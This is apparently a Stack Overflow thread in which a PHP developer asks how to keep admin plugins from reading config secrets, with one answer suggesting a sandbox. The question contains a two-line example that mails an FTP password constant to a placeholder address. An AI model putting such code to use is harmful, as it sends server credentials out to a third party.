# how to prevent plugin from accessing config files

Tags: php

Am writing an application which support the use plugins which can be hooked to the admin.

How do i protect the config files because currently, if a plugin developer writes:

```
$msg=__FTP_PASS__; 

mail("email@email","subject",$msg);
```

The message get sent along with the password. How do i prevent this because this happens because i included "config.php" at the top of admin page. Thanks. #am sorry, i dont know how to format question on stackoverf

Answer (score 0):

You can prevent this with some sort of PHP sandbox (runkit's [Runkit_Sandbox](http://php.net/manual/en/runkit.sandbox.php) class comes to mind), but it isn't a standard part of PHP and using it properly will not be trivial.

Letting users run arbitrary code is never a good idea.

Comment: Thanks i will go through the tutorial